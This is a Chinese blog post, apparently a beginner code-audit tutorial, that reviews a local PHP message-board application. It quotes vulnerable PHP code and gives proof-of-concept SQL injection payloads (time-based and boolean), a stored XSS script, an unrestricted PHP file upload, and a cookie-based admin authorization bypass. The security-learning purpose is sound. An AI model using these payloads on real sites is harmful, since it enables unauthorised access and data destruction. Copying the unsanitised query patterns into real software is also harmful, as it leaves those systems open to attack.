代码审计(入门篇)-- 牛马留言板代码审计

最新推荐文章于 2024-06-14 10:20:59 发布
最新推荐文章于 2024-06-14 10:20:59 发布
阅读量843 收藏
点赞数 1
分类专栏: 渗透测试代码审计 文章标签: web安全 php 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47515220/article/details/125546415
版权

1.SQL注入

造成SQL注入的原因

没有对前端传入的参数做严格的过滤就拼接到SQL语句中,从而造成了SQL注入。

1.1用户登录

页面截图

查看源代码

D:\phpstudy_pro\WWW\cs.com\checkUser.php
    if(isset($_POST["user_name"]) && isset($_POST["user_pass"])){
    	//trim()函数的作用是去除首位空白字符
        $usename = trim($_POST["user_name"]);
        $password = trim($_POST["user_pass"]);
        $password = md5($password);
		//这里没有做任何的校验就直接将用户名和密码拼接在SQL语句中,造成了漏洞
        $sql = "select * from users where user_name='$usename' and user_pass='$password'";
        //echo $sql;
        //exit();
        $selectSQL = new MySql();
        //getRow()函数的作用是执行sql语句,查询单行
        $user_data = $selectSQL->getRow($sql);

漏洞复现

payload

test%27%20and%20user_pass='e10adc3949ba59abbe56e057f20f883e'%20and%20if(1=1,sleep(10),1)%20#
test%27%20and%20user_pass='e10adc3949ba59abbe56e057f20f883e'%20and%20if(1=2,sleep(10),1)%20#

1=1时放包后等待了10秒后页面显示

1=2时放包后直接显示页面

1.2留言框

页面截图

查看源代码

D:\phpstudy_pro\WWW\cs.com\comment.php
    if(!empty($_POST))
    {
        if(isset($_POST["username"]) && isset($_POST["comment_text"]))
        {
            $username = trim($_POST["username"]);
            $text = trim($_POST["comment_text"]);
            //依然没有做任何校验就直接拼接到了SQL语句中
            $sql = "insert into comment(username,text,pub_date) values('$username','$text ',now())";
			echo $sql;
            //insert into comment(username,text,pub_date) values('111','7777777777',now());
            $pubSQL = new MySql();
            $pubSQL->Exec($sql);

            $rows = $pubSQL->affectRows();

漏洞复现

payload

666%27%20and%20if(1=1,sleep(10),1)%2cnow())%20#
666%27%20and%20if(1=2,sleep(10),1)%2cnow())%20#

1=1时放包后等待了10秒后页面显示

1=2时放包后直接显示页面

1.3删除留言

页面截图

管理员删除留言

用户删除留言

查看源代码

管理员

D:\phpstudy_pro\WWW\cs.com\admin\comment_del.php
//开始删除操作
        if(isset($_GET["id"]))
        {
            $id = trim($_GET["id"]);
            $sql = "delete from comment where comment_id=$id";
            $deleteSQL = new MySql();
            $deleteSQL->Exec($sql);

用户

D:\phpstudy_pro\WWW\cs.com\del_comment.php
        if(isset($_GET["id"]))
        {
            //删除指定的评论
            $id = trim($_GET["id"]);
            $sql = "delete from comment where comment_id=$id";
            $deleteSQL = new MySql();
            $deleteSQL->Exec($sql);

漏洞复现(由于复现流程一样,因此只写了管理员的)

payload

8%20and%201=1%20--+
10%20and%201=2%20--+

id=8时,拼接and 1=1 --+放包发现页面返回正常,且数据库中id=8的留言已被删除

id=10时,拼接and 1=2 --+放包发现页面返回删除失败

1.4忘记密码

页面截图

查看源代码

D:\phpstudy_pro\WWW\cs.com\forget_check.php
    if(isset($_POST["user_name"]) && isset($_POST["user_email"])){
        $username = trim($_POST["user_name"]);
        $email = trim($_POST["user_email"]);
        //没有校验
        $sql = "select * from users where user_name = '$username' and user_email='$email'";
		echo $sql;
        $selectSQL = new MySql();
        $user_data = $selectSQL->getRow($sql);

漏洞复现

payload

test%40test.com%27%20and%201=1%20#
test%40test.com%27%20and%201=2%20#

1=1时返回正常页面

1=2时返回验证信息错误

1.5删除用户

页面截图

查看源代码

D:\phpstudy_pro\WWW\cs.com\admin\user_del.php
        if(isset($_GET["id"]))
        {
            $id = trim($_GET["id"]);
            //没有校验,直接拼接
            $sql = "delete from users where user_id=$id";
			echo $sql;
            $deleteSQL = new MySql();
            $deleteSQL->Exec($sql);

漏洞复现

payload

3%20and%201=1%20
3%20and%201=2%20

1=1时返回正常页面

1=2时返回删除失败

1.6搜索框

页面截图

查看源代码

D:\phpstudy_pro\WWW\cs.com\search.php
if(isset($_POST["search"])){

        $search  = trim($_POST["search"]);
        //没有做任何过滤,存在sql注入漏洞

        $sql_comment = "select * from comment where text like '%$search%' order by comment_id";
        $commentSQL = new MySql();
        $commentData = $commentSQL->getAll($sql_comment);

漏洞复现

payload

123%25%27%20and%20if(1=2,sleep(10),1)%20#

1=1时延迟10秒后返回正常页面

1=2时页面直接响应,且搜索内容正确

1.7管理员登录

页面截图

查看源代码

D:\phpstudy_pro\WWW\cs.com\admin\admin_check.php
    if(isset($_POST["user_name"]) && isset($_POST["user_pass"])){
        $usename = trim($_POST["user_name"]);
        $password = trim($_POST["user_pass"]);
        $password = md5($password);
        //没有对传入的参数做校验
        $sql = "select * from admin where admin_username='$usename' and admin_password='$password'";
        echo $sql;
        //exit();
        $selectSQL = new MySql();
        $user_data = $selectSQL->getRow($sql);

漏洞复现

payload

admin%27%20and%20admin_password='21232f297a57a5a743894a0e4a801fc3'%20and%201=1%20#
admin%27%20and%20admin_password='21232f297a57a5a743894a0e4a801fc3'%20and%201=2%20#

1=1时返回正常页面

1=2时返回用户名或密码错误

2.XSS

2.1留言框XSS存储型

页面截图

查看源代码

D:\phpstudy_pro\WWW\cs.com\comment.php
        if(isset($_POST["username"]) && isset($_POST["comment_text"]))
        {
            $username = trim($_POST["username"]);
            $text = trim($_POST["comment_text"]);
            //没有做任何校验就直接将前端传入的数据插入到数据库中,并且在页面中打印出来,导致了漏洞的产生
            $sql = "insert into comment(username,text,pub_date) values('$username','666' and if(1=1,sleep(10),1),now())"; #',now())";
			echo $sql;
            //insert into comment(username,text,pub_date) values('111','7777777777',now());
            $pubSQL = new MySql();
            $pubSQL->Exec($sql);
D:\phpstudy_pro\WWW\cs.com\user.php
    //获取分页用户的评论
    $start = ($curr_page-1)*5;
    $len = 5;
    $sql_comment = "select * from comment where username='$username' order by comment_id desc limit $start,$len";
    $commentSQL = new MySql();
    $commentData = $commentSQL->getAll($sql_comment);
D:\phpstudy_pro\WWW\cs.com\admin\comment_edit.php
        //查出所有留言
        $sql_comment = "select * from comment order by comment_id desc";
        $commentSQL = new MySql();
        $commentData = $commentSQL->getAll($sql_comment)

漏洞复现

payload

<script>alert(1)</script>

在所查看留言页面中进行了输出

在留言管理页面也进行了输出

在数据库中也成功被插入

2.2用户注册XSS存储型

页面截图

查看源代码

D:\phpstudy_pro\WWW\cs.com\register_user.php
    if((isset($_POST["user_pass"]))&&(isset($_POST["user_pass2"])))
    {
        $user_pass = trim($_POST["user_pass"]);
        $user_pass2 = trim($_POST["user_pass2"]);

        if($user_pass!=$user_pass2)
        {
            echo "密码不一致";
            header("Refresh:2;url=register.php");
        }else{
            $user_name = $_POST["user_name"];
            $user_email = $_POST["user_email"];
            $user_pic="./upload/default/pic.jpg";
            $user_pass = md5($user_pass);
            /*
            var_dump($_POST);
            exit();
            */
            $sql = "insert into users(user_name,user_email,user_pass,user_pic,join_date) values('$user_name','$user_email','$user_pass','$user_pic',DATE_FORMAT(NOW(),'%Y-%m-%d'))";
			echo $sql;
            $inserSQL = new MySql();
            $inserSQL->Exec($sql);
D:\phpstudy_pro\WWW\cs.com\user.php
    //获取用户信息
    $username = $_SESSION["user"];
    $sql = "select * from users where user_name='$username'";
    $userSQL = new MySql();

    $userData = $userSQL->getRow($sql);

漏洞复现

点击注册会弹框

注册刷新后也会弹框,用户名显示为空,说明xss的代码被解析

登录时也会弹窗

还有点击发留言和编辑资料按钮时也会弹框,总结下来就一句话,只要页面上有用户名的存在,就会弹框。

3.文件上传

3.1编辑资料处任意文件上传

页面截图

查看源代码

D:\phpstudy_pro\WWW\cs.com\update_user.php
            //头像设置操作,移动文件

            if($_FILES["user_pic"]["name"]!='')
            {
                //上传文件
                $pic_path = upFile();

                $username = $_SESSION["user"];
                $user_pic = $pic_path;
                //var_dump($pic_path);
                $pic_sql ="update users set user_pic='$pic_path' where user_name='$username'";

                $picSQL = new MySql();
                $picSQL->Exec($pic_sql);

                $rows = $picSQL->affectRows();
D:\phpstudy_pro\WWW\cs.com\lib\func.php
/**
 * 上传文件操作
 *
 * @return $file 返回移动后的文件路径
 */
function upFile(){
	$dir = PATH."/upload/images/".date('Y_m_d');
	$dir_bak = "/upload/images/".date('Y_m_d');
	is_dir($dir) || mkdir($dir,0777,true);
	$fileName = date('Y_m_d_H_i_s', time())."_".(rand(100000,900000));
	$fileType = strrchr($_FILES["user_pic"]["name"], ".");
	$fileName = "Upload_".$fileName.$fileType;
	$destination =  $dir."/".$fileName;
	move_uploaded_file($_FILES["user_pic"]["tmp_name"],$destination);
	$filePath  = $dir_bak."/".$fileName;
	return $filePath;
}
D:\phpstudy_pro\WWW\cs.com\admin\view\user.html
    <div class="col-md-3">
        <img width="200px" src='<?php echo $userData["user_pic"];?>' alt="头像" class="img-thumbnail">
        <br/>
        <br/>
        欢迎:<?php echo $userData["user_name"];?>
    </div>

漏洞复现

直接上传php文件

在新标签页中打开图片

4.逻辑漏洞

4.1发留言存在越权漏洞

页面截图

查看源代码

D:\phpstudy_pro\WWW\cs.com\admin\comment.php
    if(!empty($_POST))
    {
        if(isset($_POST["username"]) && isset($_POST["comment_text"]))
        {
            $username = trim($_POST["username"]);
            $text = trim($_POST["comment_text"]);
            $sql = "insert into comment(username,text,pub_date) values('$username','$text',now())";
			echo $sql;
            //insert into comment(username,text,pub_date) values('111','7777777777',now());
            $pubSQL = new MySql();
            $pubSQL->Exec($sql);

只验证了前端传来的参数是否为空,没有用户信息。

漏洞复现

抓包,把username改为admin

当然也可以改为test123,那样就可以当作是水平越权漏洞了。

4.2用户删留言存在越权漏洞

页面截图

查看源代码

D:\phpstudy_pro\WWW\cs.com\del_comment.php
//开始删除操作
        if(isset($_GET["id"]))
        {
            $id = trim($_GET["id"]);
            $sql = "delete from comment where comment_id=$id";
            $deleteSQL = new MySql();
            $deleteSQL->Exec($sql);

漏洞复现

删除test用户的留言并抓包

修改id=21并放包

查看留言,test123用户的666留言被删除了,证明漏洞存在

4.3越权删除任意用户留言(另一种姿势)

换一个浏览器登录,或者删除掉之前admin登录留下的session

直接访问以下链接并抓包

http://cs.com/admin/comment_del.php?id=1

在cookie字段中添加 ;admin=admin ,并放包

查看数据库,评论被删除,证明漏洞存在

4.4越权删除任意用户(姿势与4.3一样,就不过多赘述了)

5.未授权访问

5.1后台用户管理存在未授权访问

直接访问后台管理,并抓包

http://cs.com/admin/user_edit.php

在cookie字段添加 ;admin=admin

放包,直接登录进入后台管理页面,证明漏洞存在

a.................
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
浅谈Bypass Waf - 下(实战篇)
Ms08067安全实验室
02-08 630
文章来源|MS08067 Web漏洞挖掘班 第3期本文作者:Hi2x(Web漏洞挖掘班讲师)以下测试均为授权渗透测试:探测规则1在页面发现一处富文本编辑器,并且该内容提交后会显示在对应页面...
如何入门漏洞挖掘,以及提高自己的挖掘能力
键盘的起始页
04-09 1257
0x01:前言 大家好我是米斯特团队的一员,我的id香瓜,我们团队在这次i春秋第二次漏洞挖掘大赛中,包揽了前五名,我key表哥一不小心拿了一个第一,导致很多人来加他好友问他,如何修炼漏洞挖掘能力,我今天帮大家解答一下这个疑问,哈哈哈。 漏洞挖掘是安全圈的一个核心之一,但是随着各大厂商安全意识的增强,以及各类waf的出现。一些像sql注入,文件上传,命令执行这些漏洞也不是那...
路由器漏洞挖掘之 DIR-805L 越权文件读取漏洞分析
abc380620175的博客
04-24 462
接下来的文章都会实战复现一些关于路由器的 web /二进制漏洞,可能会写的比较细,希望能给大家带来启发。 若这里图片显示不出来可以试试挂个梯子。 前言 本文在复现 DIR-805L 任意文件读取漏洞时,将会比较详细的分析一下用于 cgi 处理的 phpcgi_main 函数其中的一些功能。在逆向 cgibin 二进制文件时,常常会遇到一些用于解析 http 请求的函数,在分析时经常对...
代码审计的规范参考(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Libra1313的博客
06-14 945
具体而言,通过审计发现源代码层面的安全弱点,但不包含软件分析、设计、测试、应用部署等层面的安全弱点。审计人员应检查代码是否将敏感数据存储在没有被锁定或被错误锁定的内存中,(将敏感数据存储于加锁不恰当的内存区域,可能会导致该内存通过虚拟内存管理器被写入到在磁盘上的交换文件中,从而使得数据更容易被外部获取),如果结果为肯定,则提示存在安全风险;审计实施结束后,组织现场审计结束会,将初始审计结果提供给被审计项目成员组,提供被审计项目组澄清误解的机会,并允许项目成员提供其他需要补充的信息(如审计员未考虑到的)。
Web Service漏洞挖掘
yggcwhat
04-08 4483
00×01 什么是Web Service Web Service是一个平台独立的,低耦合的,自包含的、基于可编程的web的应用程序,可使用开放的XML(标准通用标记语言下的一个子集)标准来描述、发布、发现、协调和配置这些应用程序,用于开发分布式的交互操作的应用程序。 Web Service技术, 能使得运行在不同机器上的不同应用无须借助附加的、专门的第三方软件或硬件, 就可相互交换数据或集成。依据Web Service规范实施的应用之间, 无论它们所使用的语言、 平台或内部协议是什么, 都可以相互交换数
Java代码生成器-icoder
11-25
Java代码生成器-iCoder是一款强大的开发工具,专为Java开发者设计,旨在提高开发效率,减少重复劳动。通过自定义模板,iCoder能够自动化地生成常见的Java代码,如实体类、DAO层、Service层以及Controller层的代码,...
py练手实例小作业-桌面宠物.zip
04-05
一个桌面宠物程序,使用PyQt5库来创建一个可爱的桌面宠物窗口,宠物的图片是随机导入的,并且宠物会随机执行一些动作。程序还使用了系统托盘图标来提供退出选项。 在程序运行时,会在桌面上显示一个小动物图标,它...
py办公示例-批量生成PPT版荣誉证书.zip
04-11
示例源码的功能是将Excel中的名单数据插入到PPT模板中生成荣誉证书。 这个脚本用Python处理PPT和Excel文件,以便根据名单生成荣誉证书。 导入所需的库: from pptx import Presentation: 导入处理PPT文件的库。...
py练手实例-九宫格填充切割.zip
04-06
代码使用了Python的PIL库(Pillow),实现了对一张图片进行填充和切割的操作。下面是代码的功能概述: fill_image函数:该函数用于将输入的图片填充为正方形。它首先确定输入图片的宽度和高度,然后根据较大的值...
py练手实例小作业-艺术签名生成器.zip
04-05
这段代码是一个艺术签名生成器,使用了PyQt5库来构建GUI界面,并结合requests和PIL库来实现签名的生成和保存功能。界面包括一个用于显示生成的签名图片的标签、输入姓名的文本框、选择字体和颜色的下拉框、生成签名...
SRC漏洞挖掘经验+技巧篇
Karka_的博客
03-19 2368
我们经常听到漏洞这个概念,可什么是安全漏洞?想给它一个清晰完整的定义其实是非常困难的。如果你去搜索一下对于漏洞的定义,基本上会发现高大上的学术界和讲求实用的工业界各有各的说法,漏洞相关的各种角色,比如研究者、厂商、用户,对漏洞的认识也是非常不一致的。从业多年,我至今都找不到一个满意的定义,于是我自己定义一个:安全漏洞是信息系统在生命周期的各个阶段(设计、实现、
代码审计——未授权访问详解
Boom!脑洞大爆炸的博客
06-17 1050
代码审计之未授权访问详解
代码审计入门
mingyqf的博客
01-16 2330
代码审计入门 前言 最近在看php代码审计,学习下代码审计,看了不少师傅的博客,写的很好,下面不少是借鉴师傅们的,好记性不如烂笔头,记下,以后可以方便查看。 php代码审计需要比较强的代码能力和足够的耐心。这篇文章是写给我这样的刚刚开始审计的菜鸟,下面如果写的哪里有错误的话,还望提出,不吝赐教。 在这里也立个flag:一周至少审计一种CMS(大小不分),希望自己能够坚持下去,任重而道远。 代码审计–准备 1,先放一张大图,php代码审计的几个方向,也是容易出问题的地方,没事的时候可以多看看。 2,代码审计
代码审计入门总结
hacckjacking
12-04 592
0x00 整体 学习代码审计的目标是能够独立完成对一个CMS的代码安全监测,其通用的思路有 通读全文代码,从功能函数代码开始阅读,例如include文件夹下的common_fun.php,或者有类似关键字的文件 看配置文件,带有config关键字的文件,找到mysql.class.php文件的connect()函数,查看在数据库连接时是否出现漏洞 继续跟读首页文件index.php,了解程序运作时调用了哪些函数和文件以index.php文件作为标线,一层一层去扩展阅读所包含的文件,了解其功能,之后进
代码审计篇入门
Grey的博客
07-13 2732
一、漏洞挖掘与防范1.搭建环境&lt;?php header("content-type:text/html;charset=utf-8"); //设置编码 $uid = $_GET['id']; $sql = "SELECT * FROM userinfo where id = $uid"; $conn = mysql_connect('localhost','root','root'); my...
Java代码审计入门篇
xiaoi123的博客
06-28 7988
作者:i春秋核心白帽yanzmi原文来自:https://bbs.ichunqiu.com/thread-42149-1-1.html本期斗哥带来Java代码审计的一些环境和工具准备。Java这个语言相对于PHP来说还是比较复杂的,所以一开始接触到Java源码审计的时候会遇到一些关于环境和配置上一些困难,本文记录斗哥在开始去审计Java代码的一些准备,希望能够帮助到刚入门的新手朋友们。0×00 J...
一次有意思的代码审计(初学)
Ms08067安全实验室
06-29 376
本文作者:一合(Kali Linux2020星球学员)对于代码审计初学者而言,bluecms拿来练手是不二之选.对于bluecms的审计方法,我先是用了通读全文,又用回溯危险函数进行审计...
「Java代码审计」华夏ERP3.0代码审计
橙留香Park的博客
09-22 3442
转移发布平台通知:将不再在CSDN博客发布新文章,敬请移步知识星球... ..
python写一个进阶版k-means算法代码
04-16
好的,我可以回答这个问题。下面是一个Python进阶版的k-means算法代码,你可以参考: ``` import numpy as np import matplotlib.pyplot as plt class KMeans(): """ KMeans聚类算法 """ def __init__(self, k=3, max_iter=100, tol=1e-4): self.k = k # 聚类的数目 self.max_iter = max_iter # 最大迭代次数 self.tol = tol # 容差 def fit(self, X): # 数据预处理 X = np.array(X) m, n = X.shape # 初始化聚类中心 centroids = X[np.random.choice(range(m), self.k, replace=False)] # 执行KMeans聚类算法 for i in range(self.max_iter): # 计算每个样本距离各个聚类中心的距离 distances = np.linalg.norm(X[:, np.newaxis, :] - centroids, axis=2) # 找到每个样本所属的聚类 labels = np.argmin(distances, axis=1) # 计算新的聚类中心 new_centroids = np.array([X[labels == j].mean(axis=0) for j in range(self.k)]) # 判断是否需要停止聚类循环 if np.linalg.norm(new_centroids - centroids) < self.tol: break # 更新聚类中心 centroids = new_centroids # 返回聚类结果 return labels if __name__ == '__main__': # 生成数据并进行聚类 X = np.concatenate([np.random.randn(100, 2) * 0.5 + [0, 5], np.random.randn(100, 2) * 0.5 + [5, 0], np.random.randn(100, 2) * 0.5 + [5, 5]]) kmeans = KMeans(k=3) labels = kmeans.fit(X) # 可视化聚类结果 colors = ['r', 'g', 'b'] for i in range(kmeans.k): plt.scatter(X[labels == i][:, 0], X[labels == i][:, 1], c=colors[i]) plt.show() ``` 这个代码实现了一个KMeans聚类算法,能够根据输入的数据进行聚类,并将聚类结果可视化出来。如果你有任何疑问可以继续问我哦!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值